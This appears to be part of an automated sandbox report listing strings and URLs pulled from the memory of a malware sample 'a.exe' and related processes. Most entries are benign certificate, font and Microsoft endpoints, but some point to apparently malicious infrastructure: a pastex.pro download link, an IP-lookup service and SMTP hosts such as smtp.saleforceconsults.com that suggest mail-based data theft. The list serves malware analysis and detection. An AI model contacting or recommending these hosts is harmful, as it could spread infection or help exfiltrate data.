DNS traffic detected: queries for: www.seyranikenger.com.tr

Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp	String found in binary or memory: http://api.ipify
Source: a.exe, 0000000D.00000002.953282286.0000000002F0B000.00000004.00000001.sdmp	String found in binary or memory: http://api.ipify.org
Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp	String found in binary or memory: http://api.ipify.org/
Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp	String found in binary or memory: http://api.ipify.org4
Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp	String found in binary or memory: http://api.ipify.orgD
Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp	String found in binary or memory: http://api.ipify8
Source: a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
Source: powershell.exe, 0000000A.00000002.810606306.0000000000D7C000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: a.exe, 00000001.00000002.708980355.0000000000B2E000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digicert.cg
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: a.exe, 0000000D.00000002.956651743.000000000545A000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: a.exe, 0000000D.00000002.953282286.0000000002F0B000.00000004.00000001.sdmp	String found in binary or memory: http://elb097307-934924932.us-east-1.elb.amazonaws.com
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0K
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0M
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: a.exe, 00000001.00000002.708980355.0000000000B2E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicm
Source: a.exe, 0000000D.00000002.956651743.000000000545A000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0A
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: a.exe, 00000001.00000002.709602421.00000000027A1000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771982708.0000000002881000.00000004.00000001.sdmp, a.exe, 00000011.00000002.841378696.00000000029A1000.00000004.00000001.sdmp	String found in binary or memory: http://pastex.pro
Source: a.exe, a.exe, 00000014.00000000.833793134.0000000000B22000.00000002.00020000.sdmp, mensajeria_system[1].exe.0.dr	String found in binary or memory: http://pastex.pro/b/AEmdBGcmp
Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngP
Source: a.exe, 00000001.00000002.709602421.00000000027A1000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.818610560.0000000004C71000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771982708.0000000002881000.00000004.00000001.sdmp, a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000011.00000002.841378696.00000000029A1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: a.exe, 0000000D.00000002.953732965.0000000003073000.00000004.00000001.sdmp	String found in binary or memory: http://smtp.saleforceconsults.com
Source: a.exe, 0000000D.00000002.953732965.0000000003073000.00000004.00000001.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlP
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.office.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://augloop.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://cdn.entity.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://cortana.ai
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://cr.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://directory.services.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/PesterP
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 0000000A.00000003.789977084.0000000005699000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://graph.windows.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://login.windows.local
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://management.azure.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://management.azure.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://ncus-000.contentsync.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
